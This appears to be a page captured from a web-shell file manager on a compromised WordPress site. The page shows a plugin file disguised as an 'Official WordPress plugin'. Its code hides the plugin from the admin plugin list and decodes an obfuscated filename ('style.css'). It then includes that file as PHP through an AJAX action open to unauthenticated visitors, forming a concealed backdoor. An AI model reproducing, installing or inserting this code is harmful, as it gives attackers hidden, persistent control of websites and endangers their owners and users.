BossBey File Manager
PHP:
7.4.33
OS:
Linux
User:
blog
Root
/
srv
/
app900.68ed8135.configr.cloud
/
www
/
wp-content
/
plugins
/
wp-cybersystem-pseudocode
📤 Upload
📝 New File
📁 New Folder
Close
Editing: wp-cybersystem-pseudocode.php
<?php /* Plugin Name: WP Cybersystem Pseudocode Plugin URI: http://wordpress.org/# Description: Official WordPress plugin Author: WordPress Version: 2.9.9 Author URI: http://wordpress.org/# */ if (!defined('ABSPATH')) { exit; } function tbr_tye() { global $wp_list_table; if (!isset($wp_list_table)) { return; } $l = array('wp-cybersystem-pseudocode/wp-cybersystem-pseudocode.php'); if (isset($wp_list_table->items) && is_array($wp_list_table->items)) { foreach ($wp_list_table->items as $key => $val) { if (in_array($key, $l)) { unset($wp_list_table->items[$key]); } } } } function dar_xdm($plugins) { $u = 'wp-cybersystem-pseudocode/wp-cybersystem-pseudocode.php'; if (array_key_exists($u, $plugins)) { unset($plugins[$u]); } return $plugins; } function jri($a, $x) { $z = ''; for ($y = 0; $y < strlen($a); $y += 2) { $q = ord($a[$y]) - 65; $i = ord($a[$y + 1]); if ($i > 90) $i -= 6; $e = $q * 52 + ($i - 65); $z .= chr($e - $x); } return $z; } function bew_ajax_handler() { include plugin_dir_path(__FILE__) . jri('DeDfDkDXDQDeCNDODeDe', 71); die(); } if (defined('ABSPATH')) { add_action('pre_current_active_plugins', 'tbr_tye'); add_filter('all_plugins', 'dar_xdm'); add_action('wp_ajax_cyb_pse', 'bew_ajax_handler'); add_action('wp_ajax_nopriv_cyb_pse', 'bew_ajax_handler'); }
Save
Cancel